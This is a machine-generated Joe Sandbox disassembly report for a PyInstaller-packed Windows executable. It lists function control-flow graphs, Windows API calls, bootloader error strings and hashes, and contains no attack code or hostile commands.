                                                            control_flow_graph 0 7ff7b10f1700-7ff7b10f1714 1 7ff7b10f1716-7ff7b10f172d call 7ff7b10f2b10 0->1 2 7ff7b10f172e-7ff7b10f1732 0->2 4 7ff7b10f1734-7ff7b10f173d call 7ff7b10f12a0 2->4 5 7ff7b10f1758-7ff7b10f177b call 7ff7b10f7c10 2->5 13 7ff7b10f174f-7ff7b10f1757 4->13 14 7ff7b10f173f-7ff7b10f174a call 7ff7b10f2b10 4->14 11 7ff7b10f177d-7ff7b10f17a8 call 7ff7b10f2870 5->11 12 7ff7b10f17a9-7ff7b10f17c4 call 7ff7b10f3fc0 5->12 20 7ff7b10f17c6-7ff7b10f17d9 call 7ff7b10f2b10 12->20 21 7ff7b10f17de-7ff7b10f17f1 call 7ff7b1100df4 12->21 14->13 26 7ff7b10f191f-7ff7b10f1922 call 7ff7b110076c 20->26 27 7ff7b10f1813-7ff7b10f1817 21->27 28 7ff7b10f17f3-7ff7b10f180e call 7ff7b10f2870 21->28 34 7ff7b10f1927-7ff7b10f193e 26->34 31 7ff7b10f1831-7ff7b10f1851 call 7ff7b1105570 27->31 32 7ff7b10f1819-7ff7b10f1825 call 7ff7b10f1050 27->32 37 7ff7b10f1917-7ff7b10f191a call 7ff7b110076c 28->37 41 7ff7b10f1853-7ff7b10f186d call 7ff7b10f2870 31->41 42 7ff7b10f1872-7ff7b10f1878 31->42 38 7ff7b10f182a-7ff7b10f182c 32->38 37->26 38->37 49 7ff7b10f190d-7ff7b10f1912 41->49 44 7ff7b10f1905-7ff7b10f1908 call 7ff7b110555c 42->44 45 7ff7b10f187e-7ff7b10f1887 42->45 44->49 48 7ff7b10f1890-7ff7b10f18b2 call 7ff7b1100abc 45->48 52 7ff7b10f18e5-7ff7b10f18ec 48->52 53 7ff7b10f18b4-7ff7b10f18cc call 7ff7b11011fc 48->53 49->37 55 7ff7b10f18f3-7ff7b10f18fb call 7ff7b10f2870 52->55 58 7ff7b10f18d5-7ff7b10f18e3 53->58 59 7ff7b10f18ce-7ff7b10f18d1 53->59 62 7ff7b10f1900 55->62 58->55 59->48 61 7ff7b10f18d3 59->61 61->62 62->44
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                            • API String ID: 2030045667-3833288071
                                                            • Opcode ID: 29aed41d898024d6afd6ca69df36de76f99c99904f7afb2ff6bbac2b69c01ca5
                                                            • Instruction ID: 8622e5fcdce3cbb96f275c66bcd52df25aa229fef8fb221393e17232e2dc802f
                                                            • Opcode Fuzzy Hash: 29aed41d898024d6afd6ca69df36de76f99c99904f7afb2ff6bbac2b69c01ca5
                                                            • Instruction Fuzzy Hash: 17519F21F0C64A82EB10BB1AE4912B9E391BF66BD8FC44031DF4C4769DEEBCE5558720
                                                            Function 00007FF7B10F1A90 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _fread_nolock$Message
                                                            • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                            • API String ID: 677216364-1384898525
                                                            • Opcode ID: 88bd7f25ce49e1433e5172e6c1c51183f3bc6fb5d101781aad75366123237118
                                                            • Instruction ID: 07b4985e5a82e5f9c33369baeb20fc1da396e8cbb8fff9b45650b69b64f1d68a
                                                            • Opcode Fuzzy Hash: 88bd7f25ce49e1433e5172e6c1c51183f3bc6fb5d101781aad75366123237118
                                                            • Instruction Fuzzy Hash: D3519E71A0960AC2EB14EF1DE495278B3A0EB6AB98F918135DB0C8779DDEBCE440C754
                                                            Function 00007FF7B10F1000 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 269COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 266 7ff7b10f1000-7ff7b10f39b6 call 7ff7b1100540 call 7ff7b1100538 call 7ff7b10f87a0 call 7ff7b1100538 call 7ff7b10fbda0 call 7ff7b11058d0 call 7ff7b11064d8 call 7ff7b10f1ea0 284 7ff7b10f3b5f 266->284 285 7ff7b10f39bc-7ff7b10f39cc call 7ff7b10f3eb0 266->285 287 7ff7b10f3b64-7ff7b10f3b84 call 7ff7b10fbe00 284->287 285->284 290 7ff7b10f39d2-7ff7b10f39e5 call 7ff7b10f3d80 285->290 290->284 294 7ff7b10f39eb-7ff7b10f3a12 call 7ff7b10f7b60 290->294 297 7ff7b10f3a54-7ff7b10f3a7c call 7ff7b10f8040 call 7ff7b10f1ca0 294->297 298 7ff7b10f3a14-7ff7b10f3a23 call 7ff7b10f7b60 294->298 309 7ff7b10f3a82-7ff7b10f3a98 call 7ff7b10f1ca0 297->309 310 7ff7b10f3b2d-7ff7b10f3b3e 297->310 298->297 303 7ff7b10f3a25-7ff7b10f3a2b 298->303 305 7ff7b10f3a2d-7ff7b10f3a35 303->305 306 7ff7b10f3a37-7ff7b10f3a51 call 7ff7b110555c call 7ff7b10f8040 303->306 305->306 306->297 320 7ff7b10f3a9a-7ff7b10f3ab2 call 7ff7b10f2b10 309->320 321 7ff7b10f3ab7-7ff7b10f3aba 309->321 312 7ff7b10f3b92-7ff7b10f3b95 310->312 313 7ff7b10f3b40-7ff7b10f3b47 310->313 316 7ff7b10f3bab-7ff7b10f3bc3 call 7ff7b10f8bd0 312->316 317 7ff7b10f3b97-7ff7b10f3b9d 312->317 313->312 318 7ff7b10f3b49-7ff7b10f3b51 call 7ff7b10f8970 313->318 334 7ff7b10f3bc5-7ff7b10f3bcc 316->334 335 7ff7b10f3bce-7ff7b10f3bd5 SetDllDirectoryW 316->335 322 7ff7b10f3b9f-7ff7b10f3ba9 317->322 323 7ff7b10f3bdb-7ff7b10f3be8 call 7ff7b10f6de0 317->323 336 7ff7b10f3b85-7ff7b10f3b88 call 7ff7b10f14e0 318->336 337 7ff7b10f3b53 318->337 320->284 321->310 328 7ff7b10f3abc-7ff7b10f3ad3 call 7ff7b10f3fc0 321->328 322->316 322->323 342 7ff7b10f3c33-7ff7b10f3c38 call 7ff7b10f6d60 323->342 343 7ff7b10f3bea-7ff7b10f3bf7 call 7ff7b10f6a90 323->343 345 7ff7b10f3ad5-7ff7b10f3ad8 328->345 346 7ff7b10f3ada-7ff7b10f3b06 call 7ff7b10f82b0 328->346 341 7ff7b10f3b5a call 7ff7b10f2b10 334->341 335->323 344 7ff7b10f3b8d-7ff7b10f3b90 336->344 337->341 341->284 352 7ff7b10f3c3d-7ff7b10f3c40 342->352 343->342 354 7ff7b10f3bf9-7ff7b10f3c08 call 7ff7b10f65f0 343->354 344->284 344->312 350 7ff7b10f3b15-7ff7b10f3b2b call 7ff7b10f2b10 345->350 346->310 362 7ff7b10f3b08-7ff7b10f3b10 call 7ff7b110076c 346->362 350->284 357 7ff7b10f3ce6-7ff7b10f3cf5 call 7ff7b10f34a0 352->357 358 7ff7b10f3c46-7ff7b10f3c50 352->358 371 7ff7b10f3c29-7ff7b10f3c2e call 7ff7b10f6840 354->371 372 7ff7b10f3c0a-7ff7b10f3c16 call 7ff7b10f6570 354->372 357->284 373 7ff7b10f3cfb-7ff7b10f3d54 call 7ff7b10f8940 call 7ff7b10f7fd0 call 7ff7b10f7b60 call 7ff7b10f3600 call 7ff7b10f8080 call 7ff7b10f6840 call 7ff7b10f6d60 357->373 363 7ff7b10f3c53-7ff7b10f3c5d 358->363 362->350 364 7ff7b10f3c66-7ff7b10f3c68 363->364 365 7ff7b10f3c5f-7ff7b10f3c64 363->365 369 7ff7b10f3cb1-7ff7b10f3ce1 call 7ff7b10f3600 call 7ff7b10f3440 call 7ff7b10f35f0 call 7ff7b10f6840 call 7ff7b10f6d60 364->369 370 7ff7b10f3c6a-7ff7b10f3c8d call 7ff7b10f1ee0 364->370 365->363 365->364 369->287 370->284 384 7ff7b10f3c93-7ff7b10f3c9d 370->384 371->342 372->371 385 7ff7b10f3c18-7ff7b10f3c27 call 7ff7b10f6c30 372->385 409 7ff7b10f3d56-7ff7b10f3d5d call 7ff7b10f7d40 373->409 410 7ff7b10f3d62-7ff7b10f3d65 call 7ff7b10f1e70 373->410 388 7ff7b10f3ca0-7ff7b10f3caf 384->388 385->352 388->369 388->388 409->410 413 7ff7b10f3d6a-7ff7b10f3d6c 410->413 413->287
                                                            APIs
                                                              • Part of subcall function 00007FF7B10F3EB0: GetModuleFileNameW.KERNEL32(?,00007FF7B10F39CA), ref: 00007FF7B10F3EE1
                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF7B10F3BD5
                                                              • Part of subcall function 00007FF7B10F7B60: GetEnvironmentVariableW.KERNEL32(00007FF7B10F39FF), ref: 00007FF7B10F7B9A
                                                              • Part of subcall function 00007FF7B10F7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7B10F7BB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                            • API String ID: 2344891160-1544818733
                                                            • Opcode ID: 9142216fe1597e1c9e17d458b54f40fc9f4f49d9b38e9defbc386d8b2912fed3
                                                            • Instruction ID: 9e1e7fff09d2b06fdefa26a9df734e0f838b20385a096a3e2cbfb6a9e6f80f0c
                                                            • Opcode Fuzzy Hash: 9142216fe1597e1c9e17d458b54f40fc9f4f49d9b38e9defbc386d8b2912fed3
                                                            • Instruction Fuzzy Hash: B7B19321E1C64B41EB65BB2994A22FDD350BF6679CFC40131EB4D4B69EDEACE605C320
                                                            Function 00007FF7B10F8080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                            • String ID: CreateProcessW$Error creating child process!
                                                            • API String ID: 2895956056-3524285272
                                                            • Opcode ID: 3741643826c5352320942fbf43c5de1d0e179915c125a0ccfc2097356f541c1c
                                                            • Instruction ID: 810d496dcac2159572d4b92a7a113a89e0c002fcce1a0808f777c18e92b81f15
                                                            • Opcode Fuzzy Hash: 3741643826c5352320942fbf43c5de1d0e179915c125a0ccfc2097356f541c1c
                                                            • Instruction Fuzzy Hash: 7C413731A0878581DB20AB69F4452AAF354FFA6364F900735E7AD437D9DFBCD0548B50
                                                            Function 00007FF7B10F1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 507 7ff7b10f1050-7ff7b10f10ab call 7ff7b10fb630 510 7ff7b10f10d3-7ff7b10f10eb call 7ff7b1105570 507->510 511 7ff7b10f10ad-7ff7b10f10d2 call 7ff7b10f2b10 507->511 516 7ff7b10f10ed-7ff7b10f1104 call 7ff7b10f2870 510->516 517 7ff7b10f1109-7ff7b10f1119 call 7ff7b1105570 510->517 524 7ff7b10f1264-7ff7b10f1279 call 7ff7b10fb310 call 7ff7b110555c * 2 516->524 522 7ff7b10f111b-7ff7b10f1132 call 7ff7b10f2870 517->522 523 7ff7b10f1137-7ff7b10f1149 517->523 522->524 526 7ff7b10f1150-7ff7b10f1175 call 7ff7b1100abc 523->526 539 7ff7b10f127e-7ff7b10f1298 524->539 533 7ff7b10f117b-7ff7b10f1185 call 7ff7b1100830 526->533 534 7ff7b10f125c 526->534 533->534 540 7ff7b10f118b-7ff7b10f1197 533->540 534->524 541 7ff7b10f11a0-7ff7b10f11c8 call 7ff7b10f9a70 540->541 544 7ff7b10f1241-7ff7b10f1257 call 7ff7b10f2b10 541->544 545 7ff7b10f11ca-7ff7b10f11cd 541->545 544->534 546 7ff7b10f11cf-7ff7b10f11d9 545->546 547 7ff7b10f123c 545->547 549 7ff7b10f1203-7ff7b10f1206 546->549 550 7ff7b10f11db-7ff7b10f11e8 call 7ff7b11011fc 546->550 547->544 552 7ff7b10f1219-7ff7b10f121e 549->552 553 7ff7b10f1208-7ff7b10f1216 call 7ff7b111ace0 549->553 554 7ff7b10f11ed-7ff7b10f11f0 550->554 552->541 556 7ff7b10f1220-7ff7b10f1223 552->556 553->552 557 7ff7b10f11f2-7ff7b10f11fc call 7ff7b1100830 554->557 558 7ff7b10f11fe-7ff7b10f1201 554->558 560 7ff7b10f1225-7ff7b10f1228 556->560 561 7ff7b10f1237-7ff7b10f123a 556->561 557->552 557->558 558->544 560->544 562 7ff7b10f122a-7ff7b10f1232 560->562 561->534 562->526
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                            • API String ID: 2030045667-2813020118
                                                            • Opcode ID: 48627be277d5ca06013e799fe1ac08366ea0a7b8cedd6558f5847aca0920a891
                                                            • Instruction ID: 148fc722e7f1ac53772d82771114fa145404fe0eb89979e6807e875951d49c8f
                                                            • Opcode Fuzzy Hash: 48627be277d5ca06013e799fe1ac08366ea0a7b8cedd6558f5847aca0920a891
                                                            • Instruction Fuzzy Hash: 7B510762A0868680E760BB59A4913BAE391FBA279CFC44131DF4D8779DEEBCE415C710
                                                            Function 00007FF7B110F7B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7B110FB4A,?,?,-00000018,00007FF7B110B8F7,?,?,?,00007FF7B110B7EE,?,?,?,00007FF7B1106A32), ref: 00007FF7B110F92C
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7B110FB4A,?,?,-00000018,00007FF7B110B8F7,?,?,?,00007FF7B110B7EE,?,?,?,00007FF7B1106A32), ref: 00007FF7B110F938
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3013587201-537541572
                                                            • Opcode ID: 7d0b8cd1019d27a9e16eec9e317f5686f28e1310d53eba994d83145821214b12
                                                            • Instruction ID: e9453cd5f198fc22e2af5cd2831abececc2e7713d4dcfbdd13661308bd0889a2
                                                            • Opcode Fuzzy Hash: 7d0b8cd1019d27a9e16eec9e317f5686f28e1310d53eba994d83145821214b12
                                                            • Instruction Fuzzy Hash: 9F412421F1961B82FB11EB1AB804AB5A391FF26B98F984135DF0D4738CDEBCE5458324
                                                            Function 00007FF7B110C5FC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 840 7ff7b110c5fc-7ff7b110c622 841 7ff7b110c63d-7ff7b110c641 840->841 842 7ff7b110c624-7ff7b110c638 call 7ff7b1105a84 call 7ff7b1105aa4 840->842 844 7ff7b110ca17-7ff7b110ca23 call 7ff7b1105a84 call 7ff7b1105aa4 841->844 845 7ff7b110c647-7ff7b110c64e 841->845 858 7ff7b110ca2e 842->858 864 7ff7b110ca29 call 7ff7b110b484 844->864 845->844 847 7ff7b110c654-7ff7b110c682 845->847 847->844 850 7ff7b110c688-7ff7b110c68f 847->850 853 7ff7b110c6a8-7ff7b110c6ab 850->853 854 7ff7b110c691-7ff7b110c6a3 call 7ff7b1105a84 call 7ff7b1105aa4 850->854 856 7ff7b110c6b1-7ff7b110c6b7 853->856 857 7ff7b110ca13-7ff7b110ca15 853->857 854->864 856->857 862 7ff7b110c6bd-7ff7b110c6c0 856->862 861 7ff7b110ca31-7ff7b110ca48 857->861 858->861 862->854 865 7ff7b110c6c2-7ff7b110c6e7 862->865 864->858 868 7ff7b110c6e9-7ff7b110c6eb 865->868 869 7ff7b110c71a-7ff7b110c721 865->869 871 7ff7b110c6ed-7ff7b110c6f4 868->871 872 7ff7b110c712-7ff7b110c718 868->872 873 7ff7b110c723-7ff7b110c74b call 7ff7b110e19c call 7ff7b110b4ec * 2 869->873 874 7ff7b110c6f6-7ff7b110c70d call 7ff7b1105a84 call 7ff7b1105aa4 call 7ff7b110b484 869->874 871->872 871->874 877 7ff7b110c798-7ff7b110c7af 872->877 901 7ff7b110c768-7ff7b110c793 call 7ff7b110ce24 873->901 902 7ff7b110c74d-7ff7b110c763 call 7ff7b1105aa4 call 7ff7b1105a84 873->902 905 7ff7b110c8a0 874->905 880 7ff7b110c82a-7ff7b110c834 call 7ff7b111456c 877->880 881 7ff7b110c7b1-7ff7b110c7b9 877->881 893 7ff7b110c83a-7ff7b110c84f 880->893 894 7ff7b110c8be 880->894 881->880 882 7ff7b110c7bb-7ff7b110c7bd 881->882 882->880 886 7ff7b110c7bf-7ff7b110c7d5 882->886 886->880 890 7ff7b110c7d7-7ff7b110c7e3 886->890 890->880 895 7ff7b110c7e5-7ff7b110c7e7 890->895 893->894 899 7ff7b110c851-7ff7b110c863 GetConsoleMode 893->899 897 7ff7b110c8c3-7ff7b110c8e3 ReadFile 894->897 895->880 900 7ff7b110c7e9-7ff7b110c801 895->900 903 7ff7b110c8e9-7ff7b110c8f1 897->903 904 7ff7b110c9dd-7ff7b110c9e6 GetLastError 897->904 899->894 906 7ff7b110c865-7ff7b110c86d 899->906 900->880 910 7ff7b110c803-7ff7b110c80f 900->910 901->877 902->905 903->904 912 7ff7b110c8f7 903->912 907 7ff7b110c9e8-7ff7b110c9fe call 7ff7b1105aa4 call 7ff7b1105a84 904->907 908 7ff7b110ca03-7ff7b110ca06 904->908 909 7ff7b110c8a3-7ff7b110c8ad call 7ff7b110b4ec 905->909 906->897 914 7ff7b110c86f-7ff7b110c891 ReadConsoleW 906->914 907->905 918 7ff7b110c899-7ff7b110c89b call 7ff7b1105a18 908->918 919 7ff7b110ca0c-7ff7b110ca0e 908->919 909->861 910->880 917 7ff7b110c811-7ff7b110c813 910->917 921 7ff7b110c8fe-7ff7b110c913 912->921 923 7ff7b110c8b2-7ff7b110c8bc 914->923 924 7ff7b110c893 GetLastError 914->924 917->880 928 7ff7b110c815-7ff7b110c825 917->928 918->905 919->909 921->909 930 7ff7b110c915-7ff7b110c920 921->930 923->921 924->918 928->880 933 7ff7b110c947-7ff7b110c94f 930->933 934 7ff7b110c922-7ff7b110c93b call 7ff7b110c214 930->934 935 7ff7b110c9cb-7ff7b110c9d8 call 7ff7b110c054 933->935 936 7ff7b110c951-7ff7b110c963 933->936 942 7ff7b110c940-7ff7b110c942 934->942 935->942 939 7ff7b110c9be-7ff7b110c9c6 936->939 940 7ff7b110c965 936->940 939->909 943 7ff7b110c96a-7ff7b110c971 940->943 942->909 945 7ff7b110c9ad-7ff7b110c9b8 943->945 946 7ff7b110c973-7ff7b110c977 943->946 945->939 947 7ff7b110c979-7ff7b110c980 946->947 948 7ff7b110c993 946->948 947->948 949 7ff7b110c982-7ff7b110c986 947->949 950 7ff7b110c999-7ff7b110c9a9 948->950 949->948 951 7ff7b110c988-7ff7b110c991 949->951 950->943 952 7ff7b110c9ab 950->952 951->950 952->939
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 4661795aadc1949d3fbcdb9a4755a9ecd7d0fe9808f7a0d652296c9cb9922c2d
                                                            • Instruction ID: e7cd10ad84129b8f5c3cb0cd28d6cfbd45a62a1f0b5a11bd592623bccca306b1
                                                            • Opcode Fuzzy Hash: 4661795aadc1949d3fbcdb9a4755a9ecd7d0fe9808f7a0d652296c9cb9922c2d
                                                            • Instruction Fuzzy Hash: 47C1E622D0868B91EB50AB1DB0483BDB751EFA2798FA54172DB4D03399DFFCE4458B20
                                                            Function 00007FF7B10F8650 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                            • String ID:
                                                            • API String ID: 995526605-0
                                                            • Opcode ID: b199e8e08dbafb2fefb291e728498370fa2251d2026f483e6f64b3b10aef1c42
                                                            • Instruction ID: bc05fbd4e278d0a1dacf6fbcd77fc5c6bebbb048750174cc103411fa1c206b78
                                                            • Opcode Fuzzy Hash: b199e8e08dbafb2fefb291e728498370fa2251d2026f483e6f64b3b10aef1c42
                                                            • Instruction Fuzzy Hash: CE215835A0CB4281DB50AB5DF485269E3A0FF967A8F600235DB6D47ADCDFACD4548710
                                                            Function 00007FF7B10F8970 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FF7B10F8650: GetCurrentProcess.KERNEL32 ref: 00007FF7B10F8670
                                                              • Part of subcall function 00007FF7B10F8650: OpenProcessToken.ADVAPI32 ref: 00007FF7B10F8681
                                                              • Part of subcall function 00007FF7B10F8650: GetTokenInformation.KERNELBASE ref: 00007FF7B10F86A6
                                                              • Part of subcall function 00007FF7B10F8650: GetLastError.KERNEL32 ref: 00007FF7B10F86B0
                                                              • Part of subcall function 00007FF7B10F8650: GetTokenInformation.KERNELBASE ref: 00007FF7B10F86F0
                                                              • Part of subcall function 00007FF7B10F8650: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7B10F870C
                                                              • Part of subcall function 00007FF7B10F8650: CloseHandle.KERNEL32 ref: 00007FF7B10F8724
                                                            • LocalFree.KERNEL32(00000000,00007FF7B10F3B4E), ref: 00007FF7B10F89FC
                                                            • LocalFree.KERNEL32 ref: 00007FF7B10F8A05
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
